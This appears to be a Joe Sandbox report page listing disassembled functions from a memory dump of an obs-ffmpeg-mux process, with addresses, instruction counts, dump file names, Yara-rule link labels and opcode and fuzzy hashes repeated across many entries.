Instruction ID: ca9363cc01e3b1451cb20fca4d6b9591381f298c801a65f1bfcac4f17d15eb21
Opcode Fuzzy Hash: 6f7b787218cfe6dc98328e18f40f484bb36194aafcb0adaf6dc1dee95f7ee729
Instruction Fuzzy Hash: 6BB1D2B7F1AA8497DB748F54E042EBD7BB0FF54B84F459075CB0A53B80E62CA915A300

Function 00007FF8A7BE9D50 Relevance: .3, Instructions: 304COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b431d04f8cfd326d065826c0ea4a07768d4831b2dc7686569c959b8d95ae5da
Instruction ID: 4af2d01b7848f3a022ad8f99174974bba732e7eede495c17844ca35a8ae08eb3
Opcode Fuzzy Hash: 1b431d04f8cfd326d065826c0ea4a07768d4831b2dc7686569c959b8d95ae5da
Instruction Fuzzy Hash: 20B1C1A260A5C06AEB198F7698206EF6BA0EB5DBC4F44E032DFDD4B746DD2CD245D301

Function 00007FF8A7BEA520 Relevance: .3, Instructions: 299COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd04e1f6e5b77fd235431d6daf680498f867f8c369b5541b7e47b1bcb3da3638
Instruction ID: 8bd33862888c1fae510d53c8ca831b2cb035d662b991f24dbb22f92a23b6e9b3
Opcode Fuzzy Hash: bd04e1f6e5b77fd235431d6daf680498f867f8c369b5541b7e47b1bcb3da3638
Instruction Fuzzy Hash: 94B1CD735006588FD348DF6ED85843E7BA2F7D8B59B9B0229DB4317780EB706826DB90

Function 00007FF8A7BEA1B0 Relevance: .3, Instructions: 293COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c26bc9e0afa6a36dad590029bfac38e6475024b67d277dcd255fc33b8d7af121
Instruction ID: d29e0def2814247105a88675a651c2fdc66cd3e80cc4daae0afd3252ac3ae397
Opcode Fuzzy Hash: c26bc9e0afa6a36dad590029bfac38e6475024b67d277dcd255fc33b8d7af121
Instruction Fuzzy Hash: B2B17F33A001A48FD788CF6ED89887D37A3E7C871179B832ADB4553789DA746809DBD0

Function 00007FF8A7C02F20 Relevance: .3, Instructions: 274COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99f169184c6d2b13734529f87c174bec29b0316c2a188a1d7a05902af3d816c2
Instruction ID: 5b160a82e91b71d4c18ee6dcf6cd0ce876b3d320e06b0d8d19979e41d5f8aaf0
Opcode Fuzzy Hash: 99f169184c6d2b13734529f87c174bec29b0316c2a188a1d7a05902af3d816c2
Instruction Fuzzy Hash: D7919C91B2E16263FB698E5D840173EA695FF11BC0F40A03DDD4E47780DA2EE782D780

Function 00007FF8A7BE6E70 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8a701fd31c154d2dc192229eb25d8d25638208f0de1ecaa09b169f4e8a8f8eb
Instruction ID: 5ecff00a341bd34dbe8412c3541c4df4444f7e048cbc0b7a87d7250357c9fd73
Opcode Fuzzy Hash: c8a701fd31c154d2dc192229eb25d8d25638208f0de1ecaa09b169f4e8a8f8eb
Instruction Fuzzy Hash: 45A130720198148BE34BCF5E948021EB3E1FB48A9FB616710EF4F87661D636AE63D750

Function 00007FF8A7C244D0 Relevance: .2, Instructions: 203COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90b32cb7f7fc63c6fb00127071f37436bbba4780064a9dd077ecd279716693df
Instruction ID: 12688690c1760798c70147a3f751e1435f1b4607293789735b5acae809f700be
Opcode Fuzzy Hash: 90b32cb7f7fc63c6fb00127071f37436bbba4780064a9dd077ecd279716693df
Instruction Fuzzy Hash: BE91D2231092E0AED306CF3A96449AE7FE0F71E788B9AD151DF954BB47C238E612D750

Function 00007FF8A7BE9A50 Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76ca8846758f7279c89c706cb55d4a6c794990205b94bc84ef3eb9dab7f83264
Instruction ID: 202b5fd875c05523ccb4d851c8da61d4de08a77a214321c6a3c3ca05a2bd2b59
Opcode Fuzzy Hash: 76ca8846758f7279c89c706cb55d4a6c794990205b94bc84ef3eb9dab7f83264
Instruction Fuzzy Hash: E2616DE27064655AEF989F368D612AE1395BB4CBC1F81F832DD4D87385ED2CD846C342

Function 00007FF8A7C130A0 Relevance: .2, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a01a8d336d240b66a520b8f76eca36f64ac119a91bb538f3d36a02399c46787c
Instruction ID: 3c1058904d314fbb08cbd148c735892433696fa0212d2bfe58223f622ad06f5e
Opcode Fuzzy Hash: a01a8d336d240b66a520b8f76eca36f64ac119a91bb538f3d36a02399c46787c
Instruction Fuzzy Hash: B7511762B1A3E541DB349E2B7900BAAA6C9FB48FC8F4990359D0D5BF86DA3CE4425300

Function 00007FF8A7BEE4C0 Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d77631254022a2564090f98b8bfa30d20299f2ed0b727a65807a914737ba4ae
Instruction ID: 2bafac606200386496d90e29086f2d7cffe6652dee9c78889bc98c5954046c62
Opcode Fuzzy Hash: 5d77631254022a2564090f98b8bfa30d20299f2ed0b727a65807a914737ba4ae
Instruction Fuzzy Hash: 9E418662F0650213FF19ED76AC5906E5697BBC87D87049139EE0F8BB8DED78E482D240

Function 00007FF8A7C21E10 Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: afccfe9f3e014e08196aad724a937f91ef825408217a78f00344b29ce58b4f81
Instruction ID: a65e7671d7d4234779d244854c6469e6454d5de9b305a3e8d6571c9e862b63af
Opcode Fuzzy Hash: afccfe9f3e014e08196aad724a937f91ef825408217a78f00344b29ce58b4f81
Instruction Fuzzy Hash: AC51C373A0A2C1ABD71A9F25A9046ADBFE0FB19788B488035DF9D43B45C63CE651D710

Function 00007FF8A7BED210 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 925e7221762b452499bd5f1cd8d4647ae936fd8bfb8d6f0e8219c8ca6ea31777
Instruction ID: 3441bcb72072f3258c4f8cfcb1dc662fe98a9b365de27eacd00a944ddf9a4148
Opcode Fuzzy Hash: 925e7221762b452499bd5f1cd8d4647ae936fd8bfb8d6f0e8219c8ca6ea31777
Instruction Fuzzy Hash: FE41C0F3F1A40657EB784D69D841B3D1780EB64FE8B089135ED1AD6BC0E9ACE9839241

Function 00007FF8A7C12B40 Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1da0fa7538a61e1ec26d81ef3ee2e77181907d7570b22cc55868e0e260c2f721
Instruction ID: 8d6d4f458ec70918791298f2c2a6be5ad1943599190d38b2e0ca28eb74cf46a8
Opcode Fuzzy Hash: 1da0fa7538a61e1ec26d81ef3ee2e77181907d7570b22cc55868e0e260c2f721
Instruction Fuzzy Hash: C9414602F1A2E10BC7924EFF4DD922DADD2158E44638CC77AA7D4C52DFD86CE20E6614

Function 00007FF8A7BECCE0 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1bbb289327d116bb0d3926814ce134dcf89bf85936bb88c31896ce7583001f71
Instruction ID: 21f633414c77e090d33c072abb32113d25f3c41e5975d298bf5935da420e7fed
Opcode Fuzzy Hash: 1bbb289327d116bb0d3926814ce134dcf89bf85936bb88c31896ce7583001f71
Instruction Fuzzy Hash: F241D5F3F3A84503EB6C8A29CC057285183A7E47B174CD235D91ACAFC8F83DEA569542

Function 00007FF8A7C128B0 Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8289133b11807aa708dee106fcce6d7ef6ccc2dac79a51c200281d0fae8d85f5
Instruction ID: 0a24dedc9a0a57ffe617537608a8400275a41b98e14bb4ea312f375e18c72059
Opcode Fuzzy Hash: 8289133b11807aa708dee106fcce6d7ef6ccc2dac79a51c200281d0fae8d85f5
Instruction Fuzzy Hash: 8741A2522380F00AC76E1F3D293AA39BE92725664774EE36EFE8342AC7D41D8910A714

Function 00007FF8A7BE13A0 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e751435a9f45e6580fe7b108adce3f96b0c8069535fb2d3307a909beff15caba
Instruction ID: 8c6ea9d5432440140b9cfa714aa7baff92c3242500218ec55f8ea40acf4a581a
Opcode Fuzzy Hash: e751435a9f45e6580fe7b108adce3f96b0c8069535fb2d3307a909beff15caba
Instruction Fuzzy Hash: 443168A3F6126A13EF198B596C02BB89441AF447D9F449231ED1E5BBC9F43CD947E200

Function 00007FF8A7BED030 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66cb80125cf637f8d0b0a114fc56422192b4e9792f88120ada6a7116402668c2
Instruction ID: a1ad1bd5ac1ad5a3da36552841876362552d8fad1d966ba1b0b9826b301edc3f
Opcode Fuzzy Hash: 66cb80125cf637f8d0b0a114fc56422192b4e9792f88120ada6a7116402668c2
Instruction Fuzzy Hash: 8D3151E7B355B943EB7C4639C856B2C0191D765BB0B8CE439DD4AC2F81E81EE6428F42

Function 00007FF8A7BE1990 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f50bf9d45b07f9fed7a8078693abee7f23351cad672a747608ffeb063cebe12d
Instruction ID: 4499982772650415fa68788e99b924cd414b49e6e828eec40e5823d0d44b1925
